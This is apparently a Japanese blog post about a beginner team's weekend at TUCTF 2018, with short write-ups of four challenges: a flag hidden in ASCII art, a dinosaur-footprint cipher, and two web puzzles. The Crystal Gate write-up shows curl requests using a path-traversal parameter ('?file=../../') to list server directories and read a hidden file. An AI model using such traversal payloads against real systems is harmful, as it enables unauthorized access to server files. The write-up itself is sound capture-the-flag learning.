TUCTF2018に参加した
TUCTFというのにチームjikyu600で参加できました。
もともとこっち方面で友達がほとんどいないんですが、研究室の先輩とその先輩の知り合いと、毎度質問ばっかして迷惑かけてしまっている先輩の3人が出てみたいと駄々こねたら忙しい中参加してくれてめちゃくちゃ咽び泣いた。サンキュですほんま・・・
ほぼ初心者のチームなために2日で1問解ければいいなあ程度でゆるく挑戦して、111位とかなりいいんじゃないか!?という結果になった
自分はLiteral
Ancient
Easter Egg: Copper Gate
Easter Egg: Crystal Gate
の4つを解いた。
Literal(misc 50pt)
問題文にあったURLをwget http://18.222.124.7
したらLiteral.htmlというのが見えたのでwget http://18.222.124.7/Literal.html
で中身みる
<html> <head> <meta http-equiv="Refresh" content="1; url=https://en.wikipedia.org/wiki/Fork_bomb"> </head> <body> <!-- * * f f f * ** * ff ff ff * * ** || ff ff ff ** ||||T|| fUffffffff * |C|||T| oooooooooooo fFff |||||||{ooooooooooRfff3o ooo4ooooooooooooooLff.ooooo0 oooNooooooooooooooo3ooooooo5ooo. oooo4oooooRoooooooooo3oooooooooo. oooDooooo4oooooNooooooooooooooooo ooooooooooooooGoooooooooooooooooo ooooooooooooooooooooo3oooooooooRo oooooooo0oooooooooooooooooooooo oooooooffUoooooooooooooooooo ooofff5ooooooooooooooooo fff }ooooooooooooooo fff --> Redirecting to Wikipedia...! </body> </html>
trコマンドで文字除去したりしてflagが得られた
Ancient(misc 464pt)
可愛いイモリと暗号もどきが写った画像が渡される
チームの人曰くヒョウモントカゲモドキらしい
ステガノグラフィーってやつなのかなと思ったけどそうではなく画像からflagを読み取る系とのこと。トカゲモドキがヒントとか
特にトカゲモドキでピンと来なくて、 The lizard is meant as a visual clue to describing the language この言葉をヒントにググる。
Lizard Language
でググったら教育番組もどきが出てきたけど全く違かった。足跡に意味は?と思いlanguage footprint
でググると画像検索で足跡とアルファベットの対応表が出てきた。
うまい具合に問題の画像にある足跡とも対応してたので、地道にアルファベットに直していくとTHE FLAG IS IF_ONLY_JURASSIC_PARK_WAS_LIKE_THISという文字列が得られた。
解いた後に問題文を読むと
Gurney showed me this tablet he found on some far off secret island, but I have no idea what it says... (Standard flag format, letters in all caps)
James Gurneyがダイノトピアという絵本を書いていたらしく、その中で足跡をアルファベットに対応させる表とかが出ていたらしい。いやかいけつゾロリしか知らんし・・・デルトラクエストすらエアプやし・・
Easter Egg: Copper Gate(web 258pt)
指定されたURLに飛ぶと工事中みたいな感じのページがでる。疑心暗鬼すぎてバナー画像が手がかりと思ってそっちを怪しんでしまっていた。
なんもねーと思ってたけどバナー画像が images/bannar.png だったの思い出して /images に移動する。するとsitenotes.txt
というのがあった。
中身は Site is in development, but active updates can be viewed by going to /devvvvv/index.html と書かれていたのでそこに移動する。そこから /devvvvv に移動して最終的には /enterthecoppergate/gate.html にたどり着いて flag がゲットできた。
Easter Egg系の問題はレディプレイヤーワンが元ネタらしいんだけど、自分以外のチーム全員元ネタ知ってたらしくて困惑した。映画みんな詳しい・・・
Easter Egg: Crystal Gate(web 446pt)
基本的にこの問題は Copper Gate -> Jade Gate -> Crystal Gate と順に解いていく。Jade Gateを別の人が解いてくれて、flagがあった場所にCrystal Gateを解くための手がかりとなる画像があったので調べる
$ exiftool star.jpg ... `XP Comment: /crystalsfordays/traversethebridge.php` ...
/crystalsfordays/traversethebridge.phpに飛ぶと次のような文が書いてある
Note: Only used for access management and to check user info.
Note2: I can’t seem to remember the param. It’s “file”
paramからチームの人が ?file=../ と ?file=../../ でトラバースしてた
$ curl http://18.191.167/crystalsfordays/traversethebridge.php?file=../ Note: Only used for access management and to check user info.<br>Note2: I can't seem to remember the param. It's "file"<br>.. enterthecoppergate devvvvv youfoundthejadegate images .git . index.html crystalsfordays
$ curl http://18.191.167/crystalsfordays/traversethebridge.php?file=../../ Note: Only used for access management and to check user info.<br>Note2: I can't seem to remember the param. It's "file"<br>.. .bash_history webserver . .bash_logout .bashrc .bash_profile TheEgg.html
そこで詰まったらしいけど、$ curl -X POST -v http://18.191.167/crystalsfordays/traversethebridge.php?file=../../TheEgg.html
してみたらflagが出てきた。別にPOSTしなくてもGETでも取れた
初心者向けのCTFってあっただけに難易度がマイルドな感じの多くてよかった。なんだけど
流石にチームみんなpwn真っ黒でやべえな・・・練習しとこ・・・てな感じで終わった
めっちゃ楽しい土日だった。ハンバーグがうまい